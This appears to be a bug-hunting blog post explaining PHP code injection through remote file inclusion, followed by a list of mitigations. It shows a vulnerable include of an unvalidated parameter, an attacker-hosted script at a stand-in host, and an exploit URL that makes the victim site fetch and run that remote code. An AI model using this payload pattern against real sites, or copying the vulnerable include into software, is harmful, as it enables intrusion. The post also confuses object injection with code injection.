About

Popular Posts

Blog Archive

Search This Blog

BUG HUNTING - PHP Code Injection Attack | Ethical Hacking| NAHID HASAN TECHNOLOGY

Share it:

 PHP Code Injection Attack


Risk type: HIGH

Description:

PHP Object Injection is an application-level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context.
PHP code injection vulnerability allows the attacker to insert malicious PHP code straight into a program/script from some outside source. Added code is a part of the application itself with the same permissions as application.

Example:

Let's assume that the PHP script named "script.php" could be found on the following link:
http://www.victim.com/script.php
The page has the following vulnerable code:
... html header ...
<?php
include ('$page');
?>
... html footer ...
The attacker could have a malicious code script ("malicious.php") on some website:
http://www.attacker.com/malicious.php
Code within that script, that the attacker wants to inject, could look like:
<?php
phpinfo();
?>
The attacker could inject malicious code using the following URL in a browser:
http://www.victim.com/script.php?page=http://www.attacker.com/malicious.php
The end result would have exploited website execute the command phpinfo() within the "script.php".

Mitigation:

  • Proper input variables validation.
  • Use a whitelist of acceptable inputs that strictly conform to specifications.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules.
  • Check for invalid characters and set up all the page files in a separate directory.
  • Use library calls rather than external processes to recreate the desired functionality.
Thank You✌✌✌

>>>ReadMore<<<

Share it:

Bug Hunting

Ethical_Hacking